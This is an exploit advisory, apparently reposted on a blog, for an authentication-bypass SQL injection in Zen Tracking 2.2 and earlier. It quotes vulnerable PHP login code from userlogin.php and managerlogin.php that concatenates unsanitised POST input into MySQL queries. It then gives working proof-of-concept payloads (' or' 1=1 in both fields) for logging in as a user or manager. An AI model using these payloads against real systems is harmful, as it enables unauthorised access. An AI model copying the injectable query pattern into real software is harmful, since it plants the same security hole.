# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0     _                   __           __       __                     1
# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
# 1                  \ \____/ >> Exploit database separated by exploit   0
# 0                   \/___/          type (local, remote, DoS, etc.)    1
# 1                                                                      1
# 0  [+] Site            : Inj3ct0r.com                                  0
# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
# 0                                                                      0
# 1                    ######################################            1
# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1
# 1                    ######################################            0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#[+] Discovered By: cr4wl3r
[+] Vuln Code :
 
[userlogin.php]
 
if (!empty($_POST['password']))
{
   $username =$_POST['username'];
   $password =$_POST['password'];
   dbConnect();
   $result1 = mysql_query("select * from ".$tbluser." where username='". $username ."' and password='". $password ."'".  mysql_error());
 
[+] PoC :
 
[ZenTracking_path]/userlogin.php
 
username: ' or' 1=1
Password: ' or' 1=1
 
 
[+] Vuln Code :
 
[managerlogin.php]
 
if (!empty($_POST['password']))
{
   $username =$_POST['username'];
   $password =$_POST['password'];
   dbConnect();
   $result1 = mysql_query("select * from ".$tblmanager." where username='". $username ."' and password='". $password ."'".  mysql_error());
 
[+] PoC :
 
[ZenTracking_path]/managerlogin.php
 
username: ' or' 1=1
Password: ' or' 1=1
Kamis, 04 Maret 2010
Zen Tracking <= 2.2 (Auth Bypass) SQL Injection Vulnerability
Diposting oleh r00t cr4wl3r di 10.19
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar